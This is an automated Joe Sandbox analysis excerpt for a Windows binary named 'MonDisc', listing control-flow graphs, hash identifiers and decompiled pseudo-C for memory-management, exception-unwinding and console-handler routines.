                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 6721 7ff62c93b4f0-7ff62c93b503 6722 7ff62c93b57e-7ff62c93b588 6721->6722 6723 7ff62c93b505-7ff62c93b50f 6721->6723 6724 7ff62c93b58a-7ff62c93b598 6722->6724 6725 7ff62c93b5d3-7ff62c93b5d9 6722->6725 6726 7ff62c93b551-7ff62c93b56b VirtualProtect 6723->6726 6727 7ff62c93b511-7ff62c93b518 6723->6727 6724->6725 6728 7ff62c93b59a-7ff62c93b5a1 6724->6728 6725->6725 6729 7ff62c93b5db-7ff62c93b5e6 6725->6729 6731 7ff62c93b571-7ff62c93b57d 6726->6731 6732 7ff62c93b600-7ff62c93b608 call 7ff62c93b9d0 6726->6732 6730 7ff62c93b51a-7ff62c93b534 VirtualProtect 6727->6730 6727->6731 6733 7ff62c93b5c5-7ff62c93b5d2 6728->6733 6734 7ff62c93b5a3-7ff62c93b5b9 VirtualProtect 6728->6734 6729->6725 6735 7ff62c93b5e8-7ff62c93b5fe VirtualProtect 6729->6735 6730->6732 6737 7ff62c93b53a-7ff62c93b550 6730->6737 6734->6732 6738 7ff62c93b5bb 6734->6738 6735->6732 6735->6733 6738->6733
                              APIs
                              Memory Dump Source
                              • Source File: 00000016.00000002.513572536.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 00000016.00000002.513552474.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.514775466.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515051181.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515192794.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515222491.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515275975.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515404464.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515442085.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515484753.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_22_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: ProtectVirtual
                              • String ID:
                              • API String ID: 544645111-0
                              • Opcode ID: e4865afb915496471d6bbcdb1aef419896af53439b49253e0173317b4e702b01
                              • Instruction ID: 0d8cc644f4d458320fa0c555a007c9d90534fc4d1b70c6243e90ab8fc1409a19
                              • Opcode Fuzzy Hash: e4865afb915496471d6bbcdb1aef419896af53439b49253e0173317b4e702b01
                              • Instruction Fuzzy Hash: 45218F62F1C98681EF54DF26E8447E92360FB04B98F480036CB0D87656DF79D994C701
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 6740 7ff62c914ac0-7ff62c914ad0 6741 7ff62c914ad6-7ff62c914ae0 6740->6741 6742 7ff62c914b79-7ff62c914b7e 6740->6742 6743 7ff62c914ae5-7ff62c914afb GetLastError 6741->6743 6744 7ff62c914b59-7ff62c914b5b SetLastError 6743->6744 6745 7ff62c914afd 6743->6745 6746 7ff62c914b61-7ff62c914b64 6744->6746 6747 7ff62c914b00-7ff62c914b17 VirtualQuery 6745->6747 6746->6743 6748 7ff62c914b6a-7ff62c914b74 6746->6748 6747->6746 6749 7ff62c914b19-7ff62c914b1e 6747->6749 6748->6742 6749->6746 6750 7ff62c914b20-7ff62c914b25 6749->6750 6750->6746 6751 7ff62c914b27-7ff62c914b2f 6750->6751 6751->6746 6752 7ff62c914b31-7ff62c914b36 6751->6752 6752->6746 6753 7ff62c914b38-7ff62c914b4b VirtualFree 6752->6753 6753->6746 6754 7ff62c914b4d-7ff62c914b57 6753->6754 6754->6744 6754->6747
                              APIs
                              Memory Dump Source
                              • Source File: 00000016.00000002.513572536.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 00000016.00000002.513552474.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.514775466.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515051181.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515192794.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515222491.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515275975.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515404464.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515442085.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515484753.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_22_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: ErrorLastVirtual$FreeQuery
                              • String ID:
                              • API String ID: 2187276999-0
                              • Opcode ID: 20c87b9970e1333da46833e6f9bdc2643c7eabd298e1a4bb3600f4f4c70c1e47
                              • Instruction ID: 03c873749e82fd4813b673589fe114e3785e648865514e48ee6eddcc99b3694b
                              • Opcode Fuzzy Hash: 20c87b9970e1333da46833e6f9bdc2643c7eabd298e1a4bb3600f4f4c70c1e47
                              • Instruction Fuzzy Hash: 58116D31E48B8182EF619F15B80132DB3A8FB89BA1F480035EA8D97B59CF7CE541CB01
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 6755 7ff62c901990-7ff62c9019bb call 7ff62c900c60 6758 7ff62c9019c2-7ff62c9019d7 call 7ff62c985328 6755->6758 6759 7ff62c9019bd 6755->6759 6763 7ff62c9019df-7ff62c901a2a call 7ff62c901990 6758->6763 6764 7ff62c9019d9-7ff62c9019de call 7ff62c9017a0 6758->6764 6759->6758 6769 7ff62c901a31-7ff62c901a35 6763->6769 6770 7ff62c901a2c 6763->6770 6764->6763 6771 7ff62c901a47-7ff62c901a5b 6769->6771 6772 7ff62c901a37-7ff62c901a42 call 7ff62c900dc0 6769->6772 6770->6769 6774 7ff62c901ae3 6771->6774 6775 7ff62c901a61-7ff62c901a7c 6771->6775 6781 7ff62c901b8d-7ff62c901ba4 6772->6781 6776 7ff62c901ae6-7ff62c901ae9 6774->6776 6782 7ff62c901a7e-7ff62c901a8a 6775->6782 6783 7ff62c901a8c-7ff62c901a97 6775->6783 6779 7ff62c901aef-7ff62c901af6 6776->6779 6780 7ff62c901b88 6776->6780 6784 7ff62c901b12-7ff62c901b4d call 7ff62c974f70 call 7ff62c901970 6779->6784 6785 7ff62c901af8-7ff62c901aff 6779->6785 6780->6781 6782->6776 6782->6783 6783->6774 6786 7ff62c901a99-7ff62c901aaa 6783->6786 6789 7ff62c901b52-7ff62c901b56 6784->6789 6785->6784 6787 7ff62c901b01-7ff62c901b08 6785->6787 6786->6774 6787->6789 6790 7ff62c901b0a 6787->6790 6793 7ff62c901b64 6789->6793 6794 7ff62c901b58-7ff62c901b62 6789->6794 6790->6780 6796 7ff62c901b6b-7ff62c901b82 RtlUnwindEx 6793->6796 6794->6793 6794->6796 6796->6780
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.513572536.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 00000016.00000002.513552474.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.514775466.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515051181.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515192794.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515222491.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515275975.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515404464.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515442085.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515484753.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_22_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: ContextEntryFunctionLookup$CaptureRestoreUnwindVirtual
                              • String ID: CCG $csm
                              • API String ID: 3115360832-2763669848
                              • Opcode ID: 5c106786abd1ca784610bfdf5277bef85e973f650f6fddc9046c55bcd675574e
                              • Instruction ID: ffe2a00263b1d474027954ae1cabb6c005b3f42586d3212f8becede02d996e0a
                              • Opcode Fuzzy Hash: 5c106786abd1ca784610bfdf5277bef85e973f650f6fddc9046c55bcd675574e
                              • Instruction Fuzzy Hash: ED41DE22F08B4582EE249B16EC0537A67A1FB44FF4F544132EE5D87BAADE3CE4418742
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 54%
                              			E00007FF67FF62C914990(signed long long __rax, long long __rbx, long long __rsi) {
                              				void* _t23;
                              				void* _t24;
                              				signed int _t25;
                              				signed long long _t46;
                              				signed long long _t47;
                              				void* _t49;
                              				void* _t57;
                              				long long _t58;
                              				long _t59;
                              				void* _t61;
                              				long long _t70;
                              				void* _t72;
                              				void* _t74;
                              				void* _t75;
                              				void* _t77;
                              
                              				 *((long long*)(_t74 + 0x18)) = __rbx;
                              				_t75 = _t74 - 0x20;
                              				GetLastError();
                              				r8d = 0x3000;
                              				_t2 = _t49 + 4; // 0x4, executed
                              				r9d = _t2;
                              				_t23 = VirtualAlloc(??, ??, ??, ??); // executed
                              				_t46 = __rax;
                              				SetLastError(_t59);
                              				_t61 =  !=  ? __rax : 0xffffffff;
                              				if (0xffffffff == 0xffffffff) goto 0x2c914aa7;
                              				 *((long long*)(_t75 + 0x30)) = _t70;
                              				 *((long long*)(_t75 + 0x38)) = __rsi;
                              				if (0xffffffff != 0xffffffff) goto 0x2c9149f4;
                              				goto 0x2c9149fa;
                              				_t5 = _t61 + 0x10; // 0x10000000f
                              				_t72 = _t5 + 0xffffffff;
                              				r8d = 0x370;
                              				_t24 = E00007FF67FF62C974DE0(_t23, 0, _t72, _t77);
                              				 *0x00BADBB4 = 0x373;
                              				 *((long long*)(_t72 + 0x348)) = 0xffffffff;
                              				 *((long long*)(_t72 + 0x350)) = 0x20000;
                              				 *((long long*)(_t72 + 0x30)) = 0xff;
                              				_t25 = E00007FF67FF62C914770(_t24, _t72);
                              				_t12 = _t72 - 0x10; // 0xffffffff
                              				_t57 = _t12 + ( *(_t72 - 8) & 0xfffffffc);
                              				if (0xffffffff == 0xffffffff) goto 0x2c914a6a;
                              				_t47 =  ~_t46;
                              				_t58 = _t57 + _t47;
                              				 *((long long*)(_t72 + 0x20)) = _t58;
                              				 *((long long*)(_t72 + 0x10)) = 0xffffffff;
                              				 *((long long*)(_t58 + 8)) = 0xffffffffffffffff;
                              				 *((long long*)(_t58 + _t61 - _t57 + 0x1ffc0 - _t47 + 8)) = 0x40;
                              				 *((long long*)(_t72 + 0x28)) = 0x200000;
                              				return _t25 & 0x00000007;
                              			}



















                              APIs
                              Memory Dump Source
                              • Source File: 00000016.00000002.513572536.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 00000016.00000002.513552474.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.514775466.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515051181.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515192794.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515222491.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515275975.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515404464.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515442085.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515484753.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_22_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: ErrorLast$AllocVirtual
                              • String ID:
                              • API String ID: 1225938287-0
                              • Opcode ID: f9c01e8079d133bec8a0bf8e62291096fc8cae84ce67d04018067ad811153b0a
                              • Instruction ID: c175c5e3c6a898471cc0f5b104a3f4c4e37390bca64c5593f9fd4b382e3d1c30
                              • Opcode Fuzzy Hash: f9c01e8079d133bec8a0bf8e62291096fc8cae84ce67d04018067ad811153b0a
                              • Instruction Fuzzy Hash: 3721C072F14A8086EB148F25ED8436972A5EB49BB8F584334DA7D4BADACF3CD5458300
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.513572536.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 00000016.00000002.513552474.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.514775466.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515051181.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515192794.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515222491.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515275975.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515404464.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515442085.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515484753.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_22_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: ProtectVirtual
                              • String ID:
                              • API String ID: 544645111-3916222277
                              • Opcode ID: bd5762d522cc1c6c6a376013eaf042b8cddcb8530fa961075b392e24916f12f7
                              • Instruction ID: 911960bf5f3841d46f036ad3088780c6cb09b86980ab0f570b5e04740f628160
                              • Opcode Fuzzy Hash: bd5762d522cc1c6c6a376013eaf042b8cddcb8530fa961075b392e24916f12f7
                              • Instruction Fuzzy Hash: 68E09261E1A68681EF14DB62E8587EC3390EB14B5CF1C0036DA1C4B752CF39C0828701
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 66%
                              			E00007FF67FF62C8FF020(void* __ebx, intOrPtr* __rax, signed long long __rcx, signed int __rdx, long long __rdi, long long __rsi, long long __r14, long long __r15) {
                              				long _t56;
                              				void* _t59;
                              				signed int _t66;
                              				void* _t75;
                              				void* _t77;
                              				intOrPtr* _t110;
                              				signed long long _t112;
                              				signed long long _t115;
                              				intOrPtr _t116;
                              				long long _t126;
                              				void* _t132;
                              				long long _t140;
                              				signed long long _t142;
                              				void* _t144;
                              				void* _t146;
                              				intOrPtr _t149;
                              
                              				 *((long long*)(_t144 + 0x50)) = _t140;
                              				_t112 = __rcx;
                              				 *((long long*)(_t144 + 0x58)) = __rsi;
                              				 *((long long*)(_t144 + 0x60)) = __rdi;
                              				 *((long long*)(_t144 + 0x28)) = __r14;
                              				 *((long long*)(_t144 + 0x20)) = __r15;
                              				E00007FF67FF62C984D84(__rax);
                              				r12d =  *__rax;
                              				_t56 = GetLastError();
                              				_t130 =  *((intOrPtr*)(__rcx + 0x20));
                              				r13d = _t56;
                              				_t149 =  *((intOrPtr*)(__rcx + 0x10));
                              				_t115 =  *( *((intOrPtr*)(__rcx + 0x20)) - 0x10) & 0xffffffff;
                              				_t146 = _t149 + 0x2d8;
                              				if ( *((char*)(_t115 + 0xa)) != 0) goto 0x2c8ff0ca;
                              				_t116 =  *((intOrPtr*)(_t115 + 0x20));
                              				if (( *(_t116 - 0x2b) & 0x00000002) == 0) goto 0x2c8ff0a4;
                              				if ( *((intOrPtr*)(__rcx + 0x30)) -  *(__rcx + 0x28) -  *(__rcx + 0x28) << 3 > 0) goto 0x2c8ff0be;
                              				E00007FF67FF62C8FB470(__rcx,  *((intOrPtr*)(__rcx + 0x20)));
                              				_t77 =  >=  ? ( *(_t116 - 0x5e) & 0x000000ff) - _t75 : 0;
                              				goto 0x2c8ff0e9;
                              				if ( *((intOrPtr*)(_t112 + 0x30)) -  *((intOrPtr*)(_t112 + 0x28)) - 0xa0 > 0) goto 0x2c8ff0e7;
                              				_t59 = E00007FF67FF62C8FB470(_t112, _t130);
                              				 *(_t146 + 0x80) = _t112;
                              				if ((bpl & 0x00000001) == 0) goto 0x2c8ff111;
                              				_t142 = __rdx & 0xfffffffe;
                              				E00007FF67FF62C910630();
                              				goto 0x2c8ff1a6;
                              				if ( *((intOrPtr*)(_t146 + 0xec)) == 0) goto 0x2c8ff131;
                              				if (( *(_t149 + 0x91) & 0x00000060) != 0) goto 0x2c8ff131;
                              				_t132 = _t142 - 4;
                              				E00007FF67FF62C910750(_t59, _t146, _t132); // executed
                              				if (( *(_t149 + 0x91) & 0x00000001) == 0) goto 0x2c8ff1a6;
                              				if (0 <= 0) goto 0x2c8ff166;
                              				 *((long long*)( *((intOrPtr*)(_t112 + 0x28)))) = 0xffffffff;
                              				 *((long long*)(_t112 + 0x28)) =  *((long long*)(_t112 + 0x28)) + 8;
                              				if (0 != 0) goto 0x2c8ff150;
                              				_t37 = _t132 - 1; // -1
                              				r8d = _t37;
                              				E00007FF67FF62C8FEEA0(_t112, _t132);
                              				if (0 <= 0) goto 0x2c8ff1a6;
                              				_t126 =  *((intOrPtr*)(_t112 + 0x28)) + 0xfffffff8;
                              				if ( *_t126 != 0xffffffff) goto 0x2c8ff1a6;
                              				 *((long long*)(_t112 + 0x28)) = _t126;
                              				_t110 = _t146 + 0xec;
                              				if (0xffffffffffffffff > 0) goto 0x2c8ff180;
                              				_t66 =  *(_t142 - 4) & 0x000000ff;
                              				if (( *(_t146 + 0xa8) & 0x00000001) == 0) goto 0x2c8ff1d4;
                              				if ( *_t110 == 0) goto 0x2c8ff1e0;
                              				if (_t66 == 0x59) goto 0x2c8ff1de;
                              				if (_t66 != 0x5c) goto 0x2c8ff1e0;
                              				E00007FF67FF62C984D84(_t110);
                              				 *_t110 = r12d;
                              				SetLastError(??);
                              				return  *(0x2ca0b8a0 + _t112 * 2) & 0x0000ffff;
                              			}




















                              APIs
                              Memory Dump Source
                              • Source File: 00000016.00000002.513572536.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 00000016.00000002.513552474.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.514775466.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515051181.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515192794.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515222491.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515275975.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515404464.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515442085.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515484753.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_22_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: ErrorLast
                              • String ID:
                              • API String ID: 1452528299-0
                              • Opcode ID: 5bb62e84b11f6eb4acd98949369f79d43ede561932ff4dab366ffe0822d93bcf
                              • Instruction ID: 6377bbac4fb2feea6185983420b7a21036aba470e4217bb156411cb714e5462a
                              • Opcode Fuzzy Hash: 5bb62e84b11f6eb4acd98949369f79d43ede561932ff4dab366ffe0822d93bcf
                              • Instruction Fuzzy Hash: 15517F32A08A8189EB11CB29D84477967A4FB84BB8F958332DE6D833D5DF3ED845C701
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 46%
                              			E00007FF67FF62C93B7F0(long long* __rax, long long __rbx, void* __rcx, long long __rsi) {
                              				int _t24;
                              				signed int _t25;
                              				void* _t27;
                              				long long* _t37;
                              				signed long long _t45;
                              				void* _t63;
                              				long long _t68;
                              				void* _t72;
                              				long long* _t75;
                              				long _t76;
                              				void* _t78;
                              				long long _t79;
                              
                              				_t37 = __rax;
                              				 *((long long*)(_t72 + 0x10)) = __rbx;
                              				 *((long long*)(_t72 + 0x18)) = _t68;
                              				 *((long long*)(_t72 + 0x20)) = __rsi;
                              				_t79 =  *((intOrPtr*)(__rcx + 0xbe8));
                              				_t45 =  *((intOrPtr*)(__rcx + 0x694)) + 0x00000003 << 0x0000000a & 0xfffff000;
                              				r14d = 0;
                              				_t50 =  ==  ? _t76 : _t79 - _t45;
                              				_t30 =  ==  ? _t76 : _t79 - _t45;
                              				if (( ==  ? _t76 : _t79 - _t45) == 0) goto 0x2c93b8a0;
                              				r9d = 4;
                              				r8d = 0x103000;
                              				VirtualAlloc(_t78, _t76); // executed
                              				_t75 = __rax;
                              				if (__rax == 0) goto 0x2c93b8a0;
                              				if (__rax - 0x7ff62c8f4bb6 + _t45 - 0x3fe00000 < 0) goto 0x2c93b8d6;
                              				if (0x7ff62c8f4bb6 - __rax - 0x3fe00000 < 0) goto 0x2c93b8d6;
                              				r8d = 0x8000;
                              				_t24 = VirtualFree(_t63, ??);
                              				asm("o16 nop [eax+eax]");
                              				_t25 = E00007FF67FF62C912230(_t24, _t27, __rcx - 0x150);
                              				if (_t37 + _t45 - 0x7fc00000 >= 0) goto 0x2c93b8a0;
                              				r14d = r14d + 1;
                              				if (r14d - 0x1f >= 0) goto 0x2c93b934;
                              				goto 0x2c93b846;
                              				 *((long long*)(__rcx + 0xbe8)) = _t75;
                              				 *((long long*)(__rcx + 0xbf0)) = _t37 + _t45;
                              				_t14 = _t75 + 0x10; // 0x10
                              				 *(__rcx + 0xc00) = _t45;
                              				 *((long long*)(__rcx + 0xbf8)) = _t14;
                              				 *((intOrPtr*)(__rcx + 0xbe4)) = 4;
                              				 *_t75 = _t79;
                              				 *( *((intOrPtr*)(__rcx + 0xbe8)) + 8) = _t45;
                              				 *((intOrPtr*)(__rcx + 0xc08)) =  *((intOrPtr*)(__rcx + 0xc08)) + _t45;
                              				return _t25 & 0x7fff0000;
                              			}

                              APIs
                              Memory Dump Source
                              • Source File: 00000016.00000002.513572536.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 00000016.00000002.513552474.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.514775466.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515051181.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515192794.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515222491.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515275975.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515404464.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515442085.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515484753.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_22_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: Virtual$AllocFree
                              • String ID:
                              • API String ID: 2087232378-0
                              • Opcode ID: 0f7646565ba74cff3643f04de9dfd9104d266136aced4bd7108743d174fba979
                              • Instruction ID: 49213d4773f531b0bd14cfebaf175c4abf7a3543b1691214cf5ab5318fabaa5f
                              • Opcode Fuzzy Hash: 0f7646565ba74cff3643f04de9dfd9104d266136aced4bd7108743d174fba979
                              • Instruction Fuzzy Hash: C031C022F18A8682EE18DF21E8143BA7764FB84BA8F584631CF6E43795DF3CD1428305
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 15%
                              			E00007FF67FF62C984AF0(long long __rbx, void* __rcx, signed int __rdx, long long __rdi, void* __rbp, long long __r14, long long _a8, long long _a16, long long _a24) {
                              				signed long long _v24;
                              				int _t20;
                              				void* _t28;
                              				void* _t31;
                              				void* _t41;
                              				void* _t43;
                              				void* _t51;
                              				void* _t62;
                              				signed int* _t64;
                              				signed long long _t65;
                              				void* _t66;
                              				void* _t67;
                              				void* _t68;
                              				intOrPtr* _t69;
                              				signed long long _t73;
                              				void* _t77;
                              				intOrPtr _t78;
                              				void* _t80;
                              				signed long long* _t85;
                              				void* _t89;
                              				signed long long _t94;
                              				intOrPtr _t96;
                              				signed long long _t97;
                              				void* _t98;
                              				signed long long _t102;
                              				signed long long _t106;
                              
                              				_a8 = __rbx;
                              				_a16 = __rdi;
                              				_a24 = __r14;
                              				_t41 = _t31;
                              				_t64 = __rdx - 3;
                              				if (_t64 - 1 <= 0) goto 0x2c984c96;
                              				_t43 = _t31 - 0x16;
                              				if (_t43 > 0) goto 0x2c984bdb;
                              				asm("bt eax, ecx");
                              				if (_t43 >= 0) goto 0x2c984bdb;
                              				r15d = 0;
                              				0x2c9c5b38();
                              				if (_t41 == 2) goto 0x2c984b48;
                              				if (_t41 != 0x15) goto 0x2c984b82;
                              				if ( *0x2ca377e8 != 0) goto 0x2c984b82;
                              				_t20 = SetConsoleCtrlHandler(??, ??); // executed
                              				if (_t20 == 0) goto 0x2c984b70;
                              				 *0x2ca377e8 = 1;
                              				goto 0x2c984b82;
                              				0x2c984d64();
                              				 *_t64 =  *0x2c9ee040();
                              				E00007FF67FF62C984730(_t21, _t20, 0x7ff62c984698);
                              				if (_t64 == 0) goto 0x2c984bc1;
                              				_t94 =  *0x2ca361d8; // 0x9df21b6e58a1
                              				_t106 = _t94 ^  *_t64;
                              				asm("dec ecx");
                              				_v24 = _t106;
                              				if (__rdx == 2) goto 0x2c984bc1;
                              				asm("dec ecx");
                              				_t102 = __rdx ^ _t94;
                              				 *_t64 = _t102;
                              				E00007FF67FF62C9C5B8C();
                              				if (1 != 0) goto 0x2c984c96;
                              				_t65 = _t106;
                              				goto 0x2c984cb4;
                              				_t51 = _t41 - 0xb;
                              				if (_t51 > 0) goto 0x2c984c96;
                              				asm("bt eax, edi");
                              				if (_t51 >= 0) goto 0x2c984c96;
                              				E00007FF67FF62C9C5560(_t65, _t64, __rdx, _t89);
                              				_t73 = _t65;
                              				if (_t65 == 0) goto 0x2c984c96;
                              				_t77 =  *_t65;
                              				_t66 = _t77;
                              				if (_t77 != 0x2ca16e00) goto 0x2c984c41;
                              				_t78 =  *0x2ca16ec8; // 0xc0
                              				E00007FF67FF62C9C5A90(_t78);
                              				 *_t73 = _t66;
                              				if (_t66 == 0) goto 0x2c984c96;
                              				E00007FF67FF62C975500();
                              				_t80 =  *_t73;
                              				_t67 = _t80;
                              				_t96 =  *0x2ca16ec0; // 0xc
                              				_t97 = _t96 + _t96;
                              				goto 0x2c984c5a;
                              				if ( *((intOrPtr*)(_t67 + 4)) == _t41) goto 0x2c984c61;
                              				_t68 = _t67 + 0x10;
                              				if (_t68 != _t67 + _t97 * 8) goto 0x2c984c51;
                              				if (_t68 == 0) goto 0x2c984c96;
                              				_t11 = _t68 + 8; // 0x8
                              				_t85 = _t11;
                              				if (_t102 == 2) goto 0x2c984c91;
                              				_t98 = _t80 + _t97 * 8;
                              				if (_t68 == _t98) goto 0x2c984c91;
                              				if ( *((intOrPtr*)(_t85 - 4)) != _t41) goto 0x2c984c91;
                              				 *_t85 = _t102;
                              				_t15 =  &(_t85[2]) - 8; // -16
                              				if (_t15 != _t98) goto 0x2c984c7c;
                              				_t69 =  *_t85;
                              				goto 0x2c984cb4;
                              				_t62 = _t41 - 0x11;
                              				if (_t62 > 0) goto 0x2c984ca5;
                              				asm("bt eax, edi");
                              				if (_t62 < 0) goto 0x2c984cb0;
                              				_t28 = E00007FF67FF62C984D84(_t69);
                              				 *_t69 = 0x16;
                              				return _t28;
                              			}

                              APIs
                              Memory Dump Source
                              • Source File: 00000016.00000002.513572536.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 00000016.00000002.513552474.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmp
